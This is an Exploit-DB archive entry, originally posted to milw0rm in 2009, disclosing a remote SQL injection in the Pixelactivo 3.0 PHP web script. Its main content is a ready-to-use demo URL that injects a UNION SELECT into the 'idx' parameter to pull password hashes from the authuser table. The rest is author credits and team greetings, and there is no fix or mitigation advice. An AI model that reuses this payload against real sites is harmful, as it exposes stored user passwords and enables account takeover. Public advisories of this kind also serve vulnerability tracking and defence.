Pixelactivo 3.0 - 'idx' SQL Injection

EDB-ID:

8882

CVE:

N/A


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2009-06-05


-------------------------AllaH AkbaR-------------------------------
Pixelactivo  Remote SQL Injection Vulnerability
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Declaration/ Snakes spiders devour
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------
Script:pixelactivo
Demo:www.pixelactivo.com/demo/
--------------------------SNAKES TEAM------------------------------------
Exploit:
--------
Demo:
http://www.Site.com/path/index.php?valor=veure&idx=6+UNION%20SELECT%201,passwd,3,4,5+from+authuser
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
--------------------------SNAKES TEAM------------------------------------
ALL www.Snakespc.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-06-05]